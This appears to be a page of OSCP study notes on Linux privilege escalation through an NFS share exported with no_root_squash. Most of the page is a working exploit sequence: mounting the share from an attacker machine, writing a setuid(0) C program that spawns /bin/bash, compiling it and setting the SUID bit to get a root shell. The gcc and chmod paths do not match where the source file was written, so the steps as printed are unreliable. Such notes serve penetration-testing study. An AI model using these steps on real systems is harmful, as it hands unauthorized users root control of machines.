// notes/ PrivEsc — Linux
🐧

NFS Root Squashing

Notes from oscp.adot8.com — linux privilege escalation.

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/nfs-root-squashing

NFS Root Squashing

bash
$cat /etc/exports

If we see no_root_squash, this means that the folder attached is shareable and can be mounted. If we connect to the file share as root, any file that we make in the share will be owned by root and if we add the SUID bit it will be ran as root.

{% embed url="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2FvwQPwI8uDqdZ8OB0KeuF%2Fimage.png?alt=media&token=1568ea4b-a9ec-4f6b-87db-48f78aef072e" %}

On our machine

bash
$showmount -e 10.10.182.186 <---- Target IP
$sudo mount -o rw,vers=3 10.10.182.186:/tmp /tmp/mountme
bash
$echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/x.c
bash
$gcc /tmp/x.c -o /tmp/x
bash
$chmod +s /tmp/mountme/x